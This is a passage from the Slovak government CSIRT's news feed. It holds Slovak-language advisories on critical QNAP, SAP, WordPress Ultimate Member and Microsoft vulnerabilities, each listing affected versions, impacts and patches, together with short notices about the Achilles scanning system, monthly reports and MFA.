<li>myQNAPcloud 1.0.x</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2023-45025 (CVSS skóre 9,0)</strong><strong> a </strong><strong>CVE-2023-39297 (CVSS skóre 8,8)</strong><strong></strong></p>



<p><strong>Kritické zraniteľnosti</strong><strong> CVE-2023-45025 a CVE-2023-39297 sa nachádzajú </strong><strong>v&nbsp;operačnom systéme QNAP a&nbsp;umožňujú útočníkovi vykonávanie príkazov</strong><strong>. V&nbsp;prípade CVE-2023-39297 je potrebná autentifikácia útočníka.</strong><strong></strong></p>



<p><strong>CVE-2024-21899 (CVSS skóre 9,8),</strong><strong> CVE-2024-21900 (CVSS skóre 4,3) a CVE-2024-21901 (CVSS skóre 4,7)</strong></p>



<p><strong>Zraniteľnosti </strong><strong>CVE-2024-21899, </strong><strong>CVE-2024-21900 a CVE-2024-21901</strong><strong> </strong><strong>sa nachádzajú </strong><strong>v&nbsp;operačnom systéme QNAP</strong><strong>. </strong><strong>Úspešné zneužitie</strong><strong> CVE-2024-21900 a&nbsp;CVE-2024-21901 umožňuje </strong><strong>vzdialenému</strong><strong> </strong><strong>autentifikovanému útočníkovi vykonávať a&nbsp;injektovať škodlivé príkazy. </strong><strong>Chyba CVE-2024-21899</strong><strong> sa týka nesprávneho overovania a&nbsp;môže viesť ku kompromitácii zabezpečenia systému.</strong></p>



<p><strong>Závažnosť zraniteľnosti:&nbsp;</strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong></strong><strong>Vykonávanie príkazov</strong></li>



<li><strong></strong><strong>Injektovanie kódu</strong></li>



<li><strong></strong><strong>Narušenie integrity</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Odporúčame bezodkladnú aktualizáciu na verzie:</strong></p>



<ul>
<li><strong></strong><strong>QTS 5.1.3.2578 build 20231110 (opravuje CVE-2023-45025 a CVE-2023-39297)</strong></li>



<li><strong></strong><strong>QTS 4.5.4.2627 build 20231225 (opravuje CVE-2023-45025 a CVE-2023-39297)</strong></li>



<li><strong></strong><strong>QTS 5.0.1.2273 build 20240314 (opravuje CVE-2024-21899, CVE-2024-21900 a CVE-2024-21901)</strong></li>



<li><strong></strong><strong>QuTS hero h5.1.3.2578 build 20231110 (opravuje CVE-2023-45025 a CVE-2023-39297)</strong></li>



<li><strong></strong><strong>QuTS hero h4.5.4.2626 build 20231225 (opravuje CVE-2023-45025 a CVE-2023-39297)</strong></li>



<li><strong></strong><strong>QuTScloud c5.0.1.2273 build 20240314 (opravuje CVE-2024-21899, CVE-2024-21900 a CVE-2024-21901)</strong></li>



<li><strong></strong><strong>myQNAPcloud 1.0.52</strong></li>
</ul>



<p><strong>Odkazy:</strong></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-21899">https://nvd.nist.gov/vuln/detail/CVE-2024-21899</a></p>



<p><a href="https://www.securityweek.com/critical-vulnerability-allows-access-to-qnap-nas-devices/">https://www.securityweek.com/critical-vulnerability-allows-access-to-qnap-nas-devices/</a></p>



<p><a href="https://www.bleepingcomputer.com/news/security/qnap-warns-of-critical-auth-bypass-flaw-in-its-nas-devices/">https://www.bleepingcomputer.com/news/security/qnap-warns-of-critical-auth-bypass-flaw-in-its-nas-devices/</a></p>



<p><a href="https://www.qnap.com/en/security-advisory/qsa-24-09">https://www.qnap.com/en/security-advisory/qsa-24-09</a></p>



<p><a href="https://www.qnap.com/en/security-advisory/qsa-23-47">https://www.qnap.com/en/security-advisory/qsa-23-47</a></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-45025">https://nvd.nist.gov/vuln/detail/CVE-2023-45025</a></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-39297">https://nvd.nist.gov/vuln/detail/CVE-2023-39297</a></p>



<p><a href="https://borncity.com/win/2024/03/12/critical-vulnerability-cve-2024-21899-allows-qnap-nas-access-without-authentication/">https://borncity.com/win/2024/03/12/critical-vulnerability-cve-2024-21899-allows-qnap-nas-access-without-authentication/</a></p>



<p><a href="https://www.qnap.com/en/security-advisories">https://www.qnap.com/en/security-advisories</a></p>



<p><a href="https://threatprotect.qualys.com/2024/03/11/qnap-patches-critical-vulnerabilities-impacting-nas-devices-cve-2024-21899-cve-2024-21900-cve-2024-21901/">https://threatprotect.qualys.com/2024/03/11/qnap-patches-critical-vulnerabilities-impacting-nas-devices-cve-2024-21899-cve-2024-21900-cve-2024-21901/</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/525/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti v produktoch SAP</title>
		<link>/posts/521</link>
					<comments>/posts/521#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 15 Mar 2024 11:52:19 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[code injection]]></category>
		<category><![CDATA[execute commands]]></category>
		<guid isPermaLink="false">/?p=521</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/SAP_zranitelnosti-1.jpg" alt="" /></p>Spoločnosť SAP vydala v marci 2024 balík opráv pre svoje produkty opravujúcich 10 zraniteľností v&#160;aplikáciách Business Client, Build Apps, NetWeaver...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/SAP_zranitelnosti-1.jpg" alt="" /></p>
<p><strong>Spoločnosť SAP vydala v marci 2024 balík opráv pre svoje produkty opravujúcich 10 zraniteľností v</strong>&nbsp;<strong>aplikáciách Business Client, Build Apps, NetWeaver AS Java a ďalších. 2 z&nbsp;nich sú označené ako kritické. Úspešné zneužitie umožňuje neautentifikovanému útočníkovi eskaláciu privilégií.</strong><strong></strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>SAP NetWeaver Administrator AS Java- verzia 7.5</li>



<li>Business Client</li>



<li>Build Apps- všetky verzie pred verziou 4.9.145</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-22127 (CVSS skóre 9,1)</strong></p>



<p><strong>Zraniteľnosť </strong><strong>CVE-2024-22127</strong><strong> </strong><strong>sa nachádza v&nbsp;rozšírení Log Viewer v&nbsp;aplikácii SAP NetWeaver Administrator AS Java.</strong><strong> Chyba umožňuje útočníkovi s&nbsp;vysokými privilégiami nahrávať ľubovoľné súbory</strong><strong>, a&nbsp;následne </strong><strong>injektovať škodlivé príkazy do systému.</strong></p>



<p><strong>CVE-2019-10744 (CVSS skóre 9,1)</strong></p>



<p><strong>Kritická zraniteľnosť </strong><strong>CVE-2019-10744</strong><strong> </strong><strong>bola objavená v knižnici lodash, ktorá je používaná v aplikácii Build Apps.</strong><strong> Úspešné zneužitie umožňuje neoprávnené vykonávanie príkazov.</strong></p>



<p><strong>Spoločnosť SAP opravila celkovo 29 bezpečnostných chýb, z&nbsp;toho 15 dostalo označenie ako vysoko závažné a&nbsp;2 chyby sú kritické.</strong></p>



<p><strong>Závažnosť zraniteľnosti:&nbsp;</strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Injektovanie škodlivého kódu</strong></li>



<li><strong></strong><strong>Neoprávnené vykonávanie príkazov</strong><strong></strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Bezodkladná aktualizácia aplikácie Build Apps na verziu 4.9.145.</strong></p>



<p><strong>Pre zmiernenie zraniteľnosti CVE-2024-22127 odporúčame pristupovať k NetWeaver Administrator pomocou používateľskej roly &#8216;NWA_READONLY&#8217; namiesto používateľskej roly &#8216;Administrators&#8217;. Viac informácií o&nbsp;zmiernení zraniteľnosti </strong><a href="https://me.sap.com/notes/3433192">tu.</a><strong></strong></p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://nvd.nist.gov/vuln/detail/cve-2019-10744">https://nvd.nist.gov/vuln/detail/cve-2019-10744</a></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-22127">https://nvd.nist.gov/vuln/detail/CVE-2024-22127</a></p>



<p><a href="https://www.securityweek.com/sap-patches-critical-command-injection-vulnerabilities/">https://www.securityweek.com/sap-patches-critical-command-injection-vulnerabilities/</a></p>



<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-22127">https://www.cve.org/CVERecord?id=CVE-2024-22127</a></p>



<p><a href="https://pathlock.com/navigating-sap-security-notes-march-2024-patch-tuesday/">https://pathlock.com/navigating-sap-security-notes-march-2024-patch-tuesday/</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/521/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Členovia VJ CSIRT prezentovali systém Achilles na medzinárodnej konferencii</title>
		<link>/posts/514</link>
					<comments>/posts/514#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 13 Mar 2024 12:57:48 +0000</pubDate>
				<category><![CDATA[Aktualita]]></category>
		<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[OCSC]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=514</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>Členovia vládnej jednotky CSIRT sa zúčastnili medzinárodnej konferencie Open Cyber Security Conference 2024, ktorá sa konala na ostrove Tenerife. Počas...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>
<p><strong>Členovia vládnej jednotky CSIRT sa zúčastnili medzinárodnej konferencie Open Cyber Security Conference 2024, ktorá sa konala na ostrove Tenerife. Počas konferencie prezentovali systém Achilles, ktorý jednotka vyvíja a&nbsp;ktorý slúži na skenovanie a&nbsp;spracovávanie informácií o&nbsp;zraniteľnostiach týkajúcich sa verejných inštitúcií.</strong></p>



<p>Medzinárodná konferencia Open Cyber Security Conference (OCSC) sa konala na Kanárskych ostrovoch v dňoch 26. februára až 1. marca 2024. Počas piatich dní sa na nej uskutočnilo množstvo vysoko odborných prednášok, ktorých sa zúčastnili experti v&nbsp;oblasti kybernetickej bezpečnosti z celej Európy, Spojených štátov amerických alebo Japonska.</p>



<p>Členovia VJ CSIRT boli pozvaní predstaviť na konferencii svoj vlastný systém Achilles. Ten &nbsp;skenuje a spracováva informácie o&nbsp;zraniteľnostiach organizácií v&nbsp;konštituencii VJ CSIRT a následne informuje kontrolované inštitúcie o týchto zraniteľnostiach. Vďaka nemu jednotka poskytuje bezplatnú službu monitoringu zraniteľností do internetu vystavených systémov organizácií v&nbsp;sektore ITVS. Viac informácií o&nbsp;systéme Achilles nájdete <a href="https://www.csirt.gov.sk/registracia-achilles.html?csrt=4564627583199546769">tu</a>. Prezentácia sa stretla s veľkým záujmom účastníkov a VJ CSIRT za ňu získala cenné pozitívne ohlasy.</p>



<p>Okrem prezentácie systému Achilles sa členovia VJ CSIRT zúčastnili aj na rôznych workshopoch a prednáškach, ktoré im pomohli rozšíriť si svoje znalosti a zručnosti v oblasti kybernetickej bezpečnosti.</p>



<p><strong>Program konferencie zahŕňal viacero noviniek v&nbsp;oblastiach:</strong></p>



<ul>
<li>Aktuálne trendy kybernetických hrozieb</li>



<li>Ochrana kritickej infraštruktúry</li>



<li>Kybernetická bezpečnosť v&nbsp;prostredí Cloudu</li>



<li>Forenzná analýza kybernetických bezpečnostných incidentov</li>
</ul>



<p>Cieľom konferencie bolo nadväzovanie a budovanie prospešných vzťahov medzi rôznymi aktérmi v oblasti kybernetickej bezpečnosti, ako sú štátne orgány, súkromné firmy alebo akademická sféra. Vďaka tomu dochádza k&nbsp;efektívnejšiemu zdieľaniu informácií a osvedčených postupov, ako aj koordináciu reakcií na kybernetické hrozby. Okrem nadväzovania kontaktov sa VJ CSIRT podarilo na konferencii získať nové poznatky a zručnosti v oblasti kybernetickej bezpečnosti a zvýšiť povedomie o VJ CSIRT a jej aktivitách.</p>



<div class="wp-block-group is-layout-constrained wp-block-group-is-layout-constrained"><div class="wp-block-group__inner-container"></div></div>



<figure class="wp-block-image size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="768" src="/wp-content/uploads/2024/03/achilles-1024x768.jpg" alt="Achilles
OCSC 2024" class="wp-image-515" style="width:609px;height:auto"/></figure>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" width="674" height="508" src="/wp-content/uploads/2024/03/OCSC.jpg" alt="" class="wp-image-516" style="width:609px;height:auto"/></figure>
]]></content:encoded>
					
					<wfw:commentRss>/posts/514/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačný prehľad kritických zraniteľností február 2024</title>
		<link>/posts/490</link>
					<comments>/posts/490#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 06 Mar 2024 08:49:05 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[2024]]></category>
		<category><![CDATA[monthly report]]></category>
		<guid isPermaLink="false">/?p=490</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci február 2024....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>
<p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci február 2024.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2024/03/Mesacnik_February.pdf" data-type="link" data-id="/wp-content/uploads/2024/03/Mesacnik_February.pdf" target="_blank" rel="noreferrer noopener">Mesačný prehľad – 02/2024 PDF (264 kB)</a></p>



<p>Prehľady sú spracovávané od októbra 2014 a sú dostupné na <a href="https://csirt.sk/mesacny-prehlad-kritickych-a-zavaznych-softverovych-zranitelnosti" target="_blank" rel="noreferrer noopener">tomto odkaze</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/490/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačná správa CSIRT.SK – Február 2024</title>
		<link>/posts/481</link>
					<comments>/posts/481#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 05 Mar 2024 07:34:46 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<guid isPermaLink="false">/?p=481</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci február 2024....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>
<p><strong>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci február 2024. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.</strong></p>



<p>CSIRT.SK ako vládna jednotka na riešenie počítačových incidentov monitoruje lokálne aj globálne dianie v rámci informačnej bezpečnosti. Štandardne tento príspevok prináša prehľad udalostí a informácií zozbieraných jednotkou CSIRT.SK pri svojej činnosti. Z kapacitných dôvodov však dočasne uverejňujeme skrátenú verziu správy, ktorá obsahuje prehľad z činnosti vládnej jednoty CSIRT a obsah mesačného prehľadu zraniteľností.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2024/03/MS2024-02short.pdf" data-type="link" data-id="/wp-content/uploads/2024/03/MS2024-02short.pdf" target="_blank" rel="noreferrer noopener">Mesačná správa – 02/2024 PDF (309 KB)</a></p>



<p>Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti <a href="https://csirt.sk/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas" data-type="link" data-id="/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas">Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás</a><a href="https://www.csirt.gov.sk/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas.html?csrt=16888374950890012865">.</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/481/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačná správa CSIRT.SK – Január 2024</title>
		<link>/posts/479</link>
					<comments>/posts/479#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 05 Mar 2024 07:32:09 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<guid isPermaLink="false">/?p=479</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci január 2024....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>
<p><strong>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci január 2024. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.</strong></p>



<p>CSIRT.SK ako vládna jednotka na riešenie počítačových incidentov monitoruje lokálne aj globálne dianie v rámci informačnej bezpečnosti. Štandardne tento príspevok prináša prehľad udalostí a informácií zozbieraných jednotkou CSIRT.SK pri svojej činnosti. Z kapacitných dôvodov však dočasne uverejňujeme skrátenú verziu správy, ktorá obsahuje prehľad z činnosti vládnej jednoty CSIRT a obsah mesačného prehľadu zraniteľností.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2024/03/MS2024-01short.pdf" data-type="link" data-id="/wp-content/uploads/2024/03/MS2024-01short.pdf" target="_blank" rel="noreferrer noopener">Mesačná správa – 01/2024 PDF (314&nbsp;KB)</a></p>



<p>Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti <a href="https://csirt.sk/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas" data-type="link" data-id="/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas">Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás</a><a href="https://www.csirt.gov.sk/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas.html?csrt=16888374950890012865">.</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/479/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v doplnku WordPress</title>
		<link>/posts/474</link>
					<comments>/posts/474#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 04 Mar 2024 07:49:39 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[wordpress]]></category>
		<guid isPermaLink="false">/?p=474</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/WordPress_blue_logo.svg-min-1024x822.png" alt="" /></p>Obľúbená platforma na tvorbu webových stránok obsahuje kritickú zraniteľnosť typu SQLi, ktorá umožňuje neautentifikovaným útočníkom pripojiť ďalšie dotazy do existujúcich...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/WordPress_blue_logo.svg-min-1024x822.png" alt="" /></p>
<p><strong>Obľúbená platforma na tvorbu webových stránok obsahuje kritickú zraniteľnosť typu SQLi, ktorá umožňuje neautentifikovaným útočníkom pripojiť ďalšie dotazy do existujúcich dotazov SQL. To môže viesť k&nbsp;neoprávnenému prístupu k&nbsp;citlivým informáciám. Chyba sa nachádza v populárnom doplnku WordPress s názvom Ultimate Member, ktorý má viac ako 200 000 aktívnych inštalácií.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Ultimate Member 2.1.3 – 2.8.2</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-1071 (CVSS skóre 9,8)</strong></p>



<p><strong>Kritická zraniteľnosť</strong><strong> CVE-2024-1071 typu SQLi sa nachádza v&nbsp;doplnku platformy WordPress s&nbsp;názvom </strong><strong>Ultimate Member.</strong><strong> </strong><strong>Chyba sa týka nedostatočného ošetrenia parametra zadaného používateľom</strong><strong>, čo umožňuje pripojiť ďalšie dotazy do </strong><strong>predpripravených dotazov SQL</strong><strong>. </strong><strong>Úspešné zneužitie umožňuje neautentifikovanému útočníkovi neoprávnený prístup k&nbsp;citlivým informáciám pomocou injektovania SQL príkazov. </strong><strong>Pre získanie citlivých informácií by útočník </strong><strong>musel použiť prístup do databázy Time-Based blind</strong><strong>.</strong><strong> </strong><strong>Na chybu poukázal bezpečnostný výskumník Christiaan Swiers.</strong></p>



<p><strong>Závažnosť zraniteľnosti:&nbsp;</strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong></strong><strong>Prístup k citlivým informáciám</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Bezodkladná aktualizácia zásuvného modelu Ultimate Member aspoň na verziu 2.8.3. VJ CSIRT odporúča vykonať bezpečnostnú kontrolu svojej WordPress stránky, či nedošlo k neoprávnenému prístupu alebo zmenám.</strong></p>



<p><strong>Chyba sa týka len používateľov, ktorí v nastaveniach doplnku zaškrtli možnosť &#8220;Enable custom table for usermeta&#8221; (Povoliť vlastnú tabuľku pre usermeta).</strong><strong></strong></p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://thehackernews.com/2024/02/wordpress-plugin-alert-critical-sqli.html">https://thehackernews.com/2024/02/wordpress-plugin-alert-critical-sqli.html</a></p>



<p><a href="https://www.wordfence.com/blog/2024/02/2063-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-ultimate-member-wordpress-plugin/">https://www.wordfence.com/blog/2024/02/2063-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-ultimate-member-wordpress-plugin/</a></p>



<p><a href="https://op-c.net/blog/urgent-security-alert-sql-injection-vulnerability-in-wordpress-ultimate-member-plugin-cve-2024-1071/">https://op-c.net/blog/urgent-security-alert-sql-injection-vulnerability-in-wordpress-ultimate-member-plugin-cve-2024-1071/</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/474/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Viacfaktorová autentifikácia (MFA) [Infografika]</title>
		<link>/posts/467</link>
					<comments>/posts/467#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 27 Feb 2024 12:19:57 +0000</pubDate>
				<category><![CDATA[Aktualita]]></category>
		<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Infografika]]></category>
		<category><![CDATA[MFA]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=467</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>Viete čo je to viacfaktorová autentifikácia a poznáte jej výhody? Prinášame Vám jej stručné vysvetlenie a dôvody, prečo je pre...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>
<p>Viete čo je to viacfaktorová autentifikácia a poznáte jej výhody? Prinášame Vám jej stručné vysvetlenie a dôvody, prečo je pre Vás výhodné ju používať všade, kde je to možné.</p>



<h3 class="wp-block-heading">Výhody Viacfaktorovej Autentifikácie (MFA):</h3>



<ol>
<li><strong>Zvýšená bezpečnosť:</strong> MFA výrazne zvyšuje zabezpečenie Vašich účtov pred neoprávneným vstupom útočníka.</li>



<li><strong>Ochrana pred phishingom:</strong> Aj keď používateľ poskytne svoje heslo pri phishingovej kampani, útočníkovi sa nepodarí získať prístup bez ďalších autentifikačných faktorov.</li>



<li><strong>Užívateľsky prívetivé:</strong> MFA môže byť pohodlná, bezpečná a flexibilná cesta pre overenie používateľa, najmä metódou biometrického overenia alebo push notifikáciami.</li>
</ol>



<figure class="wp-block-image size-large is-resized"><img loading="lazy" decoding="async" width="512" height="1024" src="/wp-content/uploads/2024/02/Infografika_MFA-1200x2400-1-512x1024.jpeg" alt="" class="wp-image-471" style="width:759px;height:auto"/></figure>
]]></content:encoded>
					
					<wfw:commentRss>/posts/467/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Návod: WordPress hardening manuál</title>
		<link>/posts/460</link>
					<comments>/posts/460#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 27 Feb 2024 07:40:45 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[Guide]]></category>
		<category><![CDATA[Hardening]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=460</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>CSIRT.SK vám prináša manuál, ktorý vás krok za krokom prevedie základnými nastaveniami pre zabezpečenie Vašej webstránky postavenej na platforme WordPress....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>
<p>CSIRT.SK vám prináša manuál, ktorý vás krok za krokom prevedie základnými nastaveniami pre zabezpečenie Vašej webstránky postavenej na platforme WordPress. </p>



<p><a href="https://csirt.sk/wp-content/uploads/2024/07/Wordpress_hardening.pdf" data-type="link" data-id="/wp-content/uploads/2024/02/Wordpress_hardening.pdf">WordPress hardening manuál (03-2024)</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/460/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Microsoft v rámci Patch Tuesday opravil aktívne zneužívané zraniteľnosti</title>
		<link>/posts/464</link>
					<comments>/posts/464#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 27 Feb 2024 07:40:24 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Patch Tuesday]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<guid isPermaLink="false">/?p=464</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/MicrosoftLogo-4238232498.jpg" alt="" /></p>Spoločnosť Microsoft vydala vo februári 2024 balík opráv pre operačné systémy Windows opravujúcich 73 zraniteľností, 5 z nich dostalo hodnotenie...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/MicrosoftLogo-4238232498.jpg" alt="" /></p>
<p><strong>Spoločnosť Microsoft vydala vo februári 2024 balík opráv pre operačné systémy Windows opravujúcich 73 zraniteľností, 5 z nich dostalo hodnotenie kritická. Dve zraniteľnosti sú typu zero-day.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Windows 10 Version 1809 for 32-bit Systems</li>



<li>Windows Server 2019 (Server Core installation)</li>



<li>Windows Server 2022, 23H2 Edition (Server Core installation)</li>



<li>Windows 10 Version 1809 for x64-based Systems</li>



<li>Windows 11 Version 23H2 for x64-based Systems</li>



<li>Windows Server 2022</li>



<li>Windows 11 version 21H2 for x64-based Systems</li>



<li>Windows 10 Version 22H2 for 32-bit Systems</li>



<li>Windows 11 Version 23H2 for ARM64-based Systems</li>



<li>Windows 10 Version 22H2 for ARM64-based Systems</li>



<li>Windows 10 Version 22H2 for x64-based Systems</li>



<li>Windows 11 Version 22H2 for x64-based Systems</li>



<li>Windows 10 Version 21H2 for 32-bit Systems</li>



<li>Windows 10 Version 21H2 for ARM64-based Systems</li>



<li>Windows 10 Version 21H2 for x64-based Systems</li>



<li>Windows Server 2022 (Server Core installation)</li>



<li>Windows 11 Version 22H2 for ARM64-based Systems</li>



<li>Microsoft Exchange Server 2019 Cumulative Update 14, 13</li>



<li>Microsoft Exchange Server 2016 Cumulative Update 23</li>



<li>Microsoft Office 2016</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>Spoločnosť Microsoft opravila v&nbsp;rámci svojho pravidelného balíka aktualizácií Patch Tuesday 73 zraniteľností, z&nbsp;toho 5 kritických a&nbsp;2 zero-day. Najzávažnejšie zraniteľnosti umožňujú eskaláciu oprávnení, vykonávanie kódu, únik informácií, či obchádzanie bezpečnostných prvkov. Zraniteľnosti </strong><strong>CVE-2024-21413, CVE-2024-21410 a</strong><strong> CVE-2024-21412 sú aktívne zneužívané.</strong><strong></strong></p>



<p><strong>CVE-2024-21413 (CVSS skóre 9,8 )</strong></p>



<p><strong>Kritická zraniteľnosť</strong> s verejne dostupným exploitom sa nachádza v e-mailovom klientovi Outlook a umožňuje vzdialené vykonávanie kódu. <strong>Chyba sa týka nesprávneho parsovania odkazov</strong> cez protokol file:// a umožňuje vytvoriť škodlivý odkaz, ktorý obchádza funkciu Protected View Protocol, čo môže viesť <strong>k úniku informácií o lokálnych povereniach NTLM a vzdialenému vykonávaniu kódu (RCE).</strong> Úspešné zneužitie umožňuje útočníkovi získať <strong>vysoké oprávnenia ktoré zahŕňajú funkcie čítania, zápisu a mazania</strong>.</p>



